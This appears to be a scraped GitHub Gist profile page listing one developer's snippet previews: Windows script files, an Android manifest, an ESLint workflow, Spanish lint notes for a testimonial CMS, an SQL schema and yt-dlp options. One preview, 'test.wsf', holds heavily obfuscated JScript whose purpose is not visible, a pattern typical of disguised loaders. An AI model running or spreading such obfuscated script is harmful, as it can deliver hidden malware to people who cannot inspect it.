Skip to content

Instantly share code, notes, and snippets.

View Davis-3450's full-sized avatar
πŸ«₯
Mrowww

Davis Davis-3450

πŸ«₯
Mrowww
  • Colombia
  • 04:00 (UTC -05:00)
View GitHub Profile
<package>
<job>
<script language="JScript">
WScript.Echo("Hello World");
</script>
</job>
</package>
@Davis-3450
Davis-3450 / test.wsf
Created February 24, 2026 11:06
test.wsf
<job>
<script language="JScript">
(function(_0x63fc2,_0x27b311){function _0x682f48(_0x4b2eaf,_0x4d5896,_0x1584eb,_0x307989,_0x34cf08){return _0x5b26(_0x4d5896-0x27d,_0x4b2eaf);}function _0x4b3fa5(_0x2244f3,_0x236970,_0x3b287f,_0x34985b,_0x3082a2){return _0x5b26(_0x3b287f-0x131,_0x236970);}function _0x5acb05(_0x4e8dc0,_0x2ac666,_0xd01035,_0x503e8c,_0x504e80){return _0x5b26(_0xd01035- -0x17,_0x504e80);}var _0x1c30d9=_0x63fc2();function _0x526fa6(_0xe844b8,_0x28a6d6,_0x185f83,_0x33379e,_0x51302d){return _0x5b26(_0x51302d-0x2d4,_0x185f83);}function _0x49d611(_0x1c33ad,_0x2e0e95,_0xbed1a9,_0x1c5d62,_0x33b2b3){return _0x5b26(_0x2e0e95-0x203,_0x1c5d62);}while(!![]){try{var _0x1e684c=parseInt(_0x4b3fa5(0x1e0,'Ua@o',0x1cf,0x155,0x239))/(0xfa9+-0xf27+-0x81)+-parseInt(_0x682f48('fF(j',0x36d,0x3cb,0x318,0x37c))/(0x1182+0x2173+-0x32f3)*(parseInt(_0x4b3fa5(0x309,'hbqc',0x28d,0x26c,0x21c))/(-0x1510+-0x5*0x2e2+-0x17*-0x18b))+parseInt(_0x526fa6(0x3e1,0x3c6,'$qWp',0x3c3,0x3fd))/(0xcd3+-0xc86+-0x49*0x1)+-parseInt(_0x682f48('!UR
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<remote
name="davis3450"
fetch="https://github.com/Davis-3450/" />
<remove-project name="platform/frameworks/base" />
<project
@Davis-3450
Davis-3450 / eslint.yml
Created December 15, 2025 09:55
generic eslint config with bun (trigger with PR)
name: ESLint
on:
push:
branches: ["main"]
pull_request:
branches: ["main"]
# schedule: (disabled for now)
# - cron: "41 20 * * 3"

Tenemos un repo para un CMS De testimonios.

Nuestros usuarios son:

user / publico -> tiene acceso a la API publica sin autenticacion

editor / autenticado -> tiene acceso a la api de edicion admin / autenticado -> tiene acceso a la api de edicion y puede aprobar posts

Estado de lint (bun lint)

  • Gravedad estimada: 7/10
  • 26 errores (bloquean), 75 warnings

Acciones crΓ­ticas (bloquean)

  • Reemplazar any por tipos concretos:
    • src/features/auth/components/AuthLoginPage.tsx:42
    • src/features/auth/components/AuthSignupPage.tsx:48
    • src/features/projects/components/ProjectCreatePage.tsx:63
  • src/features/projects/components/ProjectList.tsx:28,136,208
<!doctype html>
<html lang="en">
<head>
<title>Eslint Report</title>
<meta charset="UTF-8" />
<base target="_blank" />
<link rel="icon" href="https://eslint.org/favicon.ico" />
<script src="https://registry.npmmirror.com/react/18.2.0/files/umd/react.production.min.js"></script>
<script src="https://registry.npmmirror.com/react-dom/18.2.0/files/umd/react-dom.production.min.js"></script>

C:\Users\davi3\GitHubprojects\S11-25-Equipo-64-WebApp\src\app(auth)\layout.tsx

β•‘ Line β”‚ Column β”‚ Type β”‚ Message β”‚ Rule ID β•‘ β•Ÿβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β•’ β•‘ 1 β”‚ 10 β”‚ warning β”‚ 'AuthLayout' is defined but never used. β”‚ @typescript-eslint/ β•‘ β•‘ β”‚ β”‚ β”‚ β”‚ no-unused-vars β•‘

C:\Users\davi3\GitHubprojects\S11-25-Equipo-64-WebApp\src\app(marketing)_components\AboutMissionPage.tsx

CREATE TYPE user_role AS ENUM ('admin','editor','visitor');
CREATE TYPE testimonial_status AS ENUM ('draft','in_review','published','rejected');
CREATE TYPE visibility AS ENUM ('public','private');
CREATE TYPE media_type AS ENUM ('image','video','file');
CREATE TYPE media_provider AS ENUM ('cloudinary','youtube','other');
CREATE TYPE moderation_decision AS ENUM ('approved','rejected');
CREATE TABLE users (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
email TEXT UNIQUE NOT NULL,
@Davis-3450
Davis-3450 / download_mp4.sh
Created October 24, 2025 19:50
ytd commands
-S res,ext:mp4:m4a --recode mp4